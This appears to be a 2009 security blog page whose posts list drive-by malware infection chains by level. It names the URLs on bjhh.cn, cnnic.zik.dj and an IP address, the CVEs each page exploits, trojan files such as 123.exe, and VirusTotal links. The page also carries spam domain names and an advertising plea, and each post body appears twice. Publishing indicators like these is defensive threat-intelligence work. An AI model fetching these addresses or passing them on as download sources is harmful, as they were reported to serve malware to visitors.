bigpenispillsstore.com
affairsexposed.com
clean-windows-vista.com
Note:If you think the information benefit to you, click on advertisement to support me for domain fees.
Malware related links *bjhh.cn* - 02 June
Links:
Level 0>http://www.bjhh.cn/360/360.htm
Level 1>http://www.bjhh.cn/360/x.htm
Exploit:
Sina Downloader BID-30223
OurGame various errors SA30469
RealPlayer Import stack overflow CVE-2007-5601
Level 2>http://cnnic.zik.dj/vv.css (Trojan)
Level 2>http://www.bjhh.cn/360/all.css
Level 3>http://www.bjhh.cn/360/4.htm
Exploit:
RealAudioObjects.RealAudio ActiveX control CVE-2008-1309
Level 4>http://cnnic.zik.dj/vv.css (Trojan)
Level 3>http://www.bjhh.cn/360/3.htm
Level 2>http://www.bjhh.cn/360/1.htm
Exploit:
Microsoft Windows MDAC Vulnerability CVE-2006-0003
Level 3>http://www.bjhh.cn/360/15.js
Level 3>http://www.bjhh.cn/360/16.js
Level 2>http://www.bjhh.cn/360/newlz.htm
Level 3>http://www.bjhh.cn/360/newlz.css
Level 2>http://www.bjhh.cn/360/s.htm
Exploit:
Sina Downloader BID-30223
Level 3>http://www.bjhh.cn/360/office.css
Level 4>http://cnnic.zik.dj/vv.css
Level 2>http://www.bjhh.cn/360/office.htm
Exploit:
ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution CVE-2008-2463
Level 3>http://www.bjhh.cn/360/office.css
Level 4>http://cnnic.zik.dj/vv.css (Trojan)
Level 2>http://www.bjhh.cn/360/bf.htm
Level 3>http://www.bjhh.cn/360/2.css
Level 3>http://www.bjhh.cn/360/bf.js
Level 2>http://www.bjhh.cn/360/cx.htm
Level 3>http://www.bjhh.cn/360/2.css
Level 2>http://www.bjhh.cn/360/2.htm
Exploit:
Ourgame GLWorld HanGamePluginCn18 Class ActiveX Control Buffer Overflows CVE-2008-0647
Level 2>http://www.bjhh.cn/360/pp.htm
Level 3>http://www.bjhh.cn/360/pp.pdf
Level 2>http://www.bjhh.cn/360/7.htm
Level 3>http://www.bjhh.cn/360/7.css
Level 1>http://www.bjhh.cn/360/fff.swf
Level 1>http://www.bjhh.cn/360/iie.swf
The sample was sent to virustotal
Disclaimer:
Whatever url links that posted above contain malicious files/trojan/virus that could harm your systems and information be stolen;Usage:URL links that posted only used for IT security officers, researchers and personal collection only. Any farmful actions totally prohibited. Used it with your own risks and wisely. Whatever risks, and consequences is totally out from to this web owner responsibility.
Level 0>http://www.bjhh.cn/360/360.htm
Level 1>http://www.bjhh.cn/360/x.htm
Exploit:
Sina Downloader BID-30223
OurGame various errors SA30469
RealPlayer Import stack overflow CVE-2007-5601
Level 2>http://cnnic.zik.dj/vv.css (Trojan)
Level 2>http://www.bjhh.cn/360/all.css
Level 3>http://www.bjhh.cn/360/4.htm
Exploit:
RealAudioObjects.RealAudio ActiveX control CVE-2008-1309
Level 4>http://cnnic.zik.dj/vv.css (Trojan)
Level 3>http://www.bjhh.cn/360/3.htm
Level 2>http://www.bjhh.cn/360/1.htm
Exploit:
Microsoft Windows MDAC Vulnerability CVE-2006-0003
Level 3>http://www.bjhh.cn/360/15.js
Level 3>http://www.bjhh.cn/360/16.js
Level 2>http://www.bjhh.cn/360/newlz.htm
Level 3>http://www.bjhh.cn/360/newlz.css
Level 2>http://www.bjhh.cn/360/s.htm
Exploit:
Sina Downloader BID-30223
Level 3>http://www.bjhh.cn/360/office.css
Level 4>http://cnnic.zik.dj/vv.css
Level 2>http://www.bjhh.cn/360/office.htm
Exploit:
ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution CVE-2008-2463
Level 3>http://www.bjhh.cn/360/office.css
Level 4>http://cnnic.zik.dj/vv.css (Trojan)
Level 2>http://www.bjhh.cn/360/bf.htm
Level 3>http://www.bjhh.cn/360/2.css
Level 3>http://www.bjhh.cn/360/bf.js
Level 2>http://www.bjhh.cn/360/cx.htm
Level 3>http://www.bjhh.cn/360/2.css
Level 2>http://www.bjhh.cn/360/2.htm
Exploit:
Ourgame GLWorld HanGamePluginCn18 Class ActiveX Control Buffer Overflows CVE-2008-0647
Level 2>http://www.bjhh.cn/360/pp.htm
Level 3>http://www.bjhh.cn/360/pp.pdf
Level 2>http://www.bjhh.cn/360/7.htm
Level 3>http://www.bjhh.cn/360/7.css
Level 1>http://www.bjhh.cn/360/fff.swf
Level 1>http://www.bjhh.cn/360/iie.swf
The sample was sent to virustotal
Disclaimer:
Whatever url links that posted above contain malicious files/trojan/virus that could harm your systems and information be stolen;Usage:URL links that posted only used for IT security officers, researchers and personal collection only. Any farmful actions totally prohibited. Used it with your own risks and wisely. Whatever risks, and consequences is totally out from to this web owner responsibility.
Monday, June 1, 2009
Malware related links - 01 June
Malware domain: 218.213.77.96
Level 0:>http://218.213.77.96/a.js
Level 1:>http://218.213.77.96/help2.html
Level 2:>http://218.213.77.96/flash.htm
Level 3:>http://218.213.77.96/iqq.htm
Level 3:>http://218.213.77.96/fqq.htm
Level 2:>http://218.213.77.96/a4.htm
Level 3:>http://218.213.77.96/14.js
Level 4:>http://218.213.77.96/123.exe -->Trojan
Level 2:>http://218.213.77.96/a2.htm
Level 2:>http://js.users.51.la/2886082.js
Level 2:>http://www.51.la/?2886082
Level 2:>http://img.users.51.la/2886082.asp
Virustotal result
http://www.virustotal.com/analisis/bdf8b6ce2d2579b7d52dd91add66eabed34ca72aa1de7517d00ffd118c2e2bac-1243861991
Level 0:>http://218.213.77.96/a.js
Level 1:>http://218.213.77.96/help2.html
Level 2:>http://218.213.77.96/flash.htm
Level 3:>http://218.213.77.96/iqq.htm
Level 3:>http://218.213.77.96/fqq.htm
Level 2:>http://218.213.77.96/a4.htm
Level 3:>http://218.213.77.96/14.js
Level 4:>http://218.213.77.96/123.exe -->Trojan
Level 2:>http://218.213.77.96/a2.htm
Level 2:>http://js.users.51.la/2886082.js
Level 2:>http://www.51.la/?2886082
Level 2:>http://img.users.51.la/2886082.asp
Virustotal result
http://www.virustotal.com/analisis/bdf8b6ce2d2579b7d52dd91add66eabed34ca72aa1de7517d00ffd118c2e2bac-1243861991
Subscribe to:
Posts (Atom)